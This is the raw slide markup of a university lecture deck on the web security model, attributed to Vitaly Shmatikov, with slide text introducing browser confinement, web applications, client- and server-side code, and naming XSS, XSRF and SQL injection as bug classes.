Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56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51.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink50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tiff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tiff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tiff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customXml" Target="../ink/ink52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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0.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink53.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image620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customXml" Target="../ink/ink54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink55.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66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customXml" Target="../ink/ink56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66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customXml" Target="../ink/ink3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml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customXml" Target="../ink/ink7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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80.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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id="{C8AC92D2-D6DE-4772-A874-5D65F883FC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3190" y="457200"/>
            <a:ext cx="11281609" cy="5943603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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 useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2E3678-25D0-49F9-9BD6-8D4D605650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738" y="621793"/>
            <a:ext cx="10954512" cy="5614416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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C81EC1-E2C4-BE41-B86A-1C257788F6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36849" y="1838472"/>
            <a:ext cx="5716338" cy="3042706"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>Web SECURITY MODEL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Vitaly Shmatikov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" dirty="0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63A45CD5-61B0-48E1-8090-7584418C2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34898" y="446824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C6D4C1FD-C274-4FA8-939A-09E6498EFC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149198" y="446823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C13D4426-8AD5-43D7-8033-05DBB3BFE6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40838" y="446823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1EC8029B-C6E2-4459-859A-7539865E00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149198" y="1092118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62BE8DAC-AFAE-F54B-82D7-32EC0C0650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10" b="910"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466548" y="1838472"/>
            <a:ext cx="3737017" cy="340299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E0FAB41-7AE9-D346-9647-AC5206D0C715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545608" y="4731345"/>
            <a:ext cx="5359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most slides are from the Stanford Web security group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5600892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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8B863A-EFC9-8943-ADF8-744DB944AD2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All of These Should Be Safe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23554" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678142FC-6A9C-144D-A377-FC33FB526A6B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5205185" y="1899891"/>
            <a:ext cx="6453415" cy="44577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en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Safe to visit an evil website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128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en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128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en-US" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Safe to delegate screen space</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555" name="Picture 3" descr="a.com.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C986EB24-2FD3-AF4A-9C79-EA7B1D98DB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200" y="2014194"/>
            <a:ext cx="1854200" cy="1162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6" name="Picture 5" descr="a.com.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2762685D-E9CB-884C-AD79-966D5FF062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200" y="3429000"/>
            <a:ext cx="1854200" cy="1162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7" name="Picture 4" descr="b.com.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01C6EE40-E1A9-6141-AB2F-E4815C2325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3443" y="3429000"/>
            <a:ext cx="1854200" cy="1162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8" name="Picture 6" descr="iframe.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350A6E32-792C-504D-B64E-C93D51BDB0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2871" y="5053356"/>
            <a:ext cx="1854200" cy="1162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90BCFE1-597D-8842-884E-87874160ABD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939643" y="4503622"/>
            <a:ext cx="45817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What is the common scenario for delegation?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F10497B-C8FF-484C-8150-40EA985EC5E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7452257" y="4910806"/>
            <a:ext cx="260640" cy="359640"/>
            <a:chOff x="7452257" y="5106754"/>
            <a:chExt cx="260640" cy="359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880F7D18-D533-0F4D-AADA-F9897D8AFF77}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7452257" y="5106754"/>
                <a:ext cx="260640" cy="35964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880F7D18-D533-0F4D-AADA-F9897D8AFF77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434257" y="5088754"/>
                  <a:ext cx="296280" cy="39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802234E4-3580-874D-AF1C-987E49B5B036}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7485017" y="5445874"/>
                <a:ext cx="189360" cy="1548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802234E4-3580-874D-AF1C-987E49B5B036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467017" y="5428234"/>
                  <a:ext cx="225000" cy="511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559830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loud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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87" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD74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21970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 25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718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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391" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EAB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29096" y="3214004"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A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13196" y="2798079"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 28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712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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281728A-C6D7-7246-88EE-C2118FCC5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Sides of Web Security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6B047A8-6A38-CD45-A8CF-8BFA1ACFE91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001485" y="3999364"/>
            <a:ext cx="4083049" cy="156966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1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Responsible for securely confining Web content presented by visited websites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5DDA0AD-7852-F14B-B6AC-14A56F41B45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5428794" y="3974778"/>
            <a:ext cx="6096000" cy="240065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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Web applications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Online merchants, banks, Google Apps … Zoom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Mix of server-side and client-side code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rgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server-side code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>written in PHP, Ruby, ASP, JSP… runs on the Web server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rgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Client-side code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>written in JavaScript… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>     runs in the Web browser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Many potential bugs: XSS, XSRF, SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1188842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loud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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87" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD74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21970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16391" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EAB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29096" y="3214004"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A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13196" y="2798079"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 28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712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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281728A-C6D7-7246-88EE-C2118FCC5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Browser’s View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6B047A8-6A38-CD45-A8CF-8BFA1ACFE91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001485" y="3999364"/>
            <a:ext cx="4083049" cy="156966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1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Responsible for securely confining Web content presented by visited websites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5F1606-7662-AF4A-AC2D-EE28FF99ED4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5358937" y="4582197"/>
            <a:ext cx="40190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  <a:latin typeface="Segoe Print" panose="02000800000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Potentially malicious!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5A0A8A5-1B81-9746-BA83-A41C68DB49FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5474172" y="3849582"/>
            <a:ext cx="501120" cy="608760"/>
            <a:chOff x="8456880" y="3317880"/>
            <a:chExt cx="501120" cy="608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B3724B63-5F30-9443-AC08-74B74F3D8F9D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8501160" y="3332280"/>
                <a:ext cx="456840" cy="5943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B3724B63-5F30-9443-AC08-74B74F3D8F9D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8465520" y="3296280"/>
                  <a:ext cx="528480" cy="66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835BA5E7-2591-EF44-8E02-959C8D6B9B2C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8456880" y="3323280"/>
                <a:ext cx="24480" cy="1699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835BA5E7-2591-EF44-8E02-959C8D6B9B2C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420880" y="3287280"/>
                  <a:ext cx="9612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3BF02E46-DF67-A945-A513-734D08A3203E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8471640" y="3317880"/>
                <a:ext cx="266760" cy="144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3BF02E46-DF67-A945-A513-734D08A3203E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435640" y="3282240"/>
                  <a:ext cx="338400" cy="860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6" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
